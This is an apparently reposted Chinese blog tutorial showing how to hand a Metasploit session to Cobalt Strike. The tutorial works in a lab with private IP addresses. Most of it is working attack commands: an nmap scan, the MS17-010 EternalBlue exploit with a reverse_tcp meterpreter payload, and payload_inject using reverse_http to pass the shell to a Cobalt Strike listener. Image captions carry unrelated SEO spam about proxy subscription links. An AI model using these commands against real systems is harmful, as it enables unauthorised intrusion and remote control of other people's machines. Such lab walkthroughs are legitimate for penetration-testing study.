如何进行MSF和CobaltStrike联动

本篇文章为大家展示了如何进行MSF和CobaltStrike联动,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

0x00环境介绍

攻击机:192.168.60.129 (kali)

受害机:192.168.60.131

网关:192.168.60.2

工具:nmap、metaspolit、cobaltstrike

0x01攻击准备

首先部署受害主机调制网卡可以互相通信。如何进行MSF和CobaltStrike联动  msf clash订阅链接分享 第1张

接下来部署web应用服务,搞的看起来像是真实的应用服务器一样哈如何进行MSF和CobaltStrike联动  msf clash订阅链接分享 第2张

0x02前攻击阶段

通过使用nmap信息收集发现开放端口445、3389及操作系统版本信息。

nmap -A 192.168.60.131   如何进行MSF和CobaltStrike联动  msf clash订阅链接分享 第3张

通过信息收集发现系统开放445端口,使用工具检测是否存在ms17_010漏洞,发现存在。如何进行MSF和CobaltStrike联动  msf clash订阅链接分享 第4张

接近着神器1 Metaspolit上场

首先打开msf,进行漏洞利用

1.搜索利用漏洞模块

search ms17_010     如何进行MSF和CobaltStrike联动  msf clash订阅链接分享 第5张

2.漏洞利用

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.60.131
set LHOST 192.168.60.129

获得session

进入meterpreter会话。如何进行MSF和CobaltStrike联动  msf clash订阅链接分享 第6张

接近着神器2Cobaltstrike上场

如果觉得功能太少,也可以和Cobaltstrike联动

启动Cobaltstrike 如何进行MSF和CobaltStrike联动  msf clash订阅链接分享 第7张

现在获得是一个MSF的meterpreter类型的session,且session id为1

在Cobaltstrike新建一个监听,配置如下: 如何进行MSF和CobaltStrike联动  msf clash订阅链接分享 第8张

在MSF中设置如下

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.60.129
set lport 12388
set session 1

如何进行MSF和CobaltStrike联动  msf clash订阅链接分享 第9张

exploit

如何进行MSF和CobaltStrike联动  msf clash订阅链接分享 第10张

这样就可以看到在Cobaltstrike中获取到了了MSF弹回的Meterpreter会话。

如何进行MSF和CobaltStrike联动  msf clash订阅链接分享 第11张

最后可以使用Cobaltstrike中集成的渗透模块进行进一步的测试。

注:只有Meterpreter类型的session才能派生给Cobaltstrike。

上述内容就是如何进行MSF和CobaltStrike联动,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注蜗牛博客行业资讯频道。

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:niceseo99@gmail.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

评论

有免费节点资源,我们会通知你!加入纸飞机订阅群

×
天气预报查看日历分享网页手机扫码留言评论电报频道链接